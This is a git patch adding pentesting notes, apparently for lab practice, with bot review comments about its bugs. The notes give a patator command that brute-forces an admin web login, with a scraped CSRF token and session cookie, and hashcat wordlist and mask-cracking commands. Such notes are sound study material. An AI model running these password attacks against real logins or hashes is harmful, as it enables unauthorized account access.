From e5bf02539675c9d2dd10017a986d759f36b6ad09 Mon Sep 17 00:00:00 2001
From: whx
Date: Tue, 30 Aug 2022 22:15:41 +0200
Subject: [PATCH] added bruteforcing stuff

---
 hashes/bruteforce/patator.md | 23 +++++++++++++++++++++++
 hashes/hashcat_utils.md | 13 +++++++++++++
 2 files changed, 36 insertions(+)
 create mode 100644 hashes/bruteforce/patator.md

diff --git a/hashes/bruteforce/patator.md b/hashes/bruteforce/patator.md
new file mode 100644
index 0000000..ad1a363
--- /dev/null
+++ b/hashes/bruteforce/patator.md
@@ -0,0 +1,23 @@
+# Patator Bruteforcing
+
+* [Lanjelot's Repo](https://github.com/lanjelot/patator/)
+
+## Modules
+
+* Available modules can be found under `patator --help`
+* Module specifics can be found via `patator -h`
+
+## Using a Module
+
+* For example `http_fuzz` can be used via
+```sh
+TARGET_IP=10.0.47.11
+CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
+SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}')
+
+echo "The CSRF is: $CSRF"
+echo "The PHPSESSID is: $SESSION_ID"
+
+patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x
+```
+
diff --git a/hashes/hashcat_utils.md b/hashes/hashcat_utils.md
index 66becd2..948a63c 100644
--- a/hashes/hashcat_utils.md
+++ b/hashes/hashcat_utils.md
@@ -1,5 +1,9 @@
 # Hashcat Utilities
 
+* [Modes](https://hashcat.net/wiki/doku.php?id=example_hashes)
+
+## Wordlists
+
 * Combine wordlists
 ```sh
 combinator wordlist.txt otherwordlist.txt > newwordlist.txt
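Review bot: In `hashes/bruteforce/patator.md` the example assigns `TARGET_IP` but the `curl` line that fetches the token reads `${IP}`, which is never set, so the request has no host and both `CSRF` and `SESSION_ID` end up empty. Use the same variable in both places, `curl -s -c stored.cookie "http://${TARGET_IP}/login.php"`, so the snippet is consistent with the `url=` argument further down. The `patator.py` line also ends in a bare `-x` with no action after it, which looks like a leftover or truncated option and should be dropped or completed.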
@@ -9,3 +13,12 @@ combinator wordlist.txt otherwordlist.txt > newwordlist.txt
 ```sh
 hashcat --force -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt
 ```
+
+## Using Masks
+
+* A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset
+* [Masks](https://hashcat.net/wiki/doku.php?id=mask_attack)
+* Bruteforcing seven lowerspace characters using `SHA2-384` as an example
+```sh
+hashcat -m 10800 -a 3 hash.out ?l?l?l?l?l?l?l
+```
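Review bot: The mask in the new `hashcat -m 10800 -a 3` example is unquoted, so the shell treats every `?` as a glob character before hashcat sees the argument. zsh aborts with "no matches found", and bash substitutes any file name in the working directory that happens to match the pattern. Quote it in the snippet: `hashcat -m 10800 -a 3 hash.out '?l?l?l?l?l?l?l'`. In the bullet just above the fence, "lowerspace" should read "lowercase".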